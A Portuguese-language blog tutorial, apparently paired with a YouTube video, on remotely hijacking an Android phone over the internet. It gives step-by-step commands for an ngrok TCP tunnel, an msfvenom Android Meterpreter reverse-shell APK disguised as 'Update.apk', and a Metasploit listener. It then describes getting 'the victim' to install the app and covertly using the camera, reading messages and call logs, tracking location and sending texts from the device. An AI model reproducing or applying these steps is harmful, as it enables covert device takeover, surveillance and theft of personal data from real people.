Hacking Android Device [Remotely]

Hacking over WAN

Pode ver o meu Video-tutorial no youtube aqui:
https://youtu.be/Bbp-AcejtHI

Usualmente na WAN, primeiro precisa de ter um IP/Hostname estático e, segundo, precisa de fazer o Port Forwarding para permitir a transmissão do seu tráfego, e todos sabemos que ambos são tão difíceis em tempo real, uma vez que temos acesso limitado às portas de uma rede.

Então, o que vamos fazer neste cenário, vamos configurar um túnel seguro usando Ngrok.

Ngrok é um sistema de proxy reverso de tunelamento que estabelece túneis a partir de endpoint público, ou seja, uma internet para um serviço de rede rodando localmente. Isso pode nos ajudar a criar uma URL pública HTTP/HTTPS para um site rodando localmente em nossa máquina. Nós não precisamos fazer nenhum tipo de encaminhamento de portas enquanto usamos o Ngrok e nosso serviço de rede irá eventualmente expor à internet com a ajuda do TCP tunneling.

Seguir estes passos para prosseguir:

Passo1: Cadastre-se para a Conta Ngrok para baixá-la.

Primeiro, você precisará se cadastrar para a Conta Ngrok, depois disso, ela o levará para a janela de download.

>

Janela de Assinatura do Ngrok

Após a assinatura, você poderá baixar o Ngrok para o seu sistema Linux.

>

>

>

>>

>

Simplesmente descomprima o arquivo baixado.

>

Step2: Conecte sua conta

>

Executar este comando adicionará seu auth token ao arquivo de configuração padrão ngrok.yml. Isto lhe dará acesso a mais recursos e tempos de sessão mais longos. (Você tem que copiar e colar seu próprio token aqui fornecido na tela inicial do ngrok após o login)

>

./ngrok authtoken <seu token>

Agora você está pronto para usar esta ferramenta. Abra seu terminal mova para o diretório onde você extraiu a ferramenta Ngrock e digite:

./ngrok tcp

escolha um número de porta na qual você quer ligar uma conexão(aqui, eu escolhi 5555 como número de porta). E depois de clicar em enter, uma tela algo assim será mostrado.

O encaminhamento aqui especifica o túnel TCP que o ngrok criou. A conexão se ligou ao localhost na porta 5555. Agora precisamos gerar uma carga útil maliciosa usando msfvenom.

Step3: Generating Payload

Você pode fazer isso abrindo um novo Terminal em sua máquina Kali Linux e então digitando o seguinte código.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Mas lembre-se, desta vez é um pouco diferente do ataque que costumávamos fazer na LAN. Aqui no lugar do endereço IP, teremos que digitar o link de encaminhamento fornecido no ngrok (2.tcp.ngrok.io). E o número da porta vai ser 15787. Lembre-se que, é importante digitar o mesmo número de porta fornecido pelo Ngrok no encaminhamento de porta.

Nota: Se digitar o endereço IP como 2.tcp.ngrok.io não está funcionando, você pode substituí-lo por um endereço IP que você pode obter usando o comando “ping”.
Abrir um terminal e digitar ping 2.tcp.ngrok.io e pressionar enter. Você receberá um endereço IP que você tem que colocar no lugar de LHOST.

Aqui, eu usei “Update.apk” como o nome do arquivo para a nossa carga útil. Este arquivo deve ser instalado no dispositivo Android do nosso alvo. Mas antes de instalar este ficheiro, temos de definir o nosso ouvinte. Para o fazer, siga o passo 4.

Passo4: Set-Up a Listener

Abra seu terminal e carrega o console Metasploit, digitando: msfconsole
Depois de carregar (após alguns segundos), carregue o exploit multi-handler digitando:

>

use exploit/multi/handler

Agora configure uma carga útil inversa digitando:

>

set payload android/meterpreter/reverse_tcp

Configure o seu LHOST como 0.0.0.0 e LPORT como 5555
(O número da porta deve ser igual ao número da porta que foi usada para ligar a conexão no ngrok)

>

set LHOST 0.0.0.0.0
set LPORT 5555

Finalmente, digite exploit para iniciar o ouvinte.

>

>

>

>

O modo de escuta está ligado

Step5: Instale o arquivo Malicious Update.apk no dispositivo do alvo

>

Deixe a vítima instalar o aplicativo, e execute-o assim que ele for instalado. Quando a vítima tocar na opção de abrir o aplicativo, você terá acesso a todos os recursos do dispositivo andróide. No entanto, nada será exibido na tela do dispositivo depois que o aplicativo for aberto.

>

Pós-Exploração

Digite ajuda para ver as várias opções que você pode usar para realizar as diferentes tarefas no dispositivo da vítima.
Você pode acessar a câmera deles e tirar uma foto sem notificá-los. Você pode verificar suas mensagens, registros de chamadas e salvá-las em seu sistema também.
Tambem, pode ver e abrir qualquer aplicação instalada no dispositivo deles. Você pode até obter as coordenadas da localização atual do usuário.
Você também pode enviar mensagens para qualquer número de contato através do dispositivo deles.

Deixe uma resposta

O seu endereço de email não será publicado.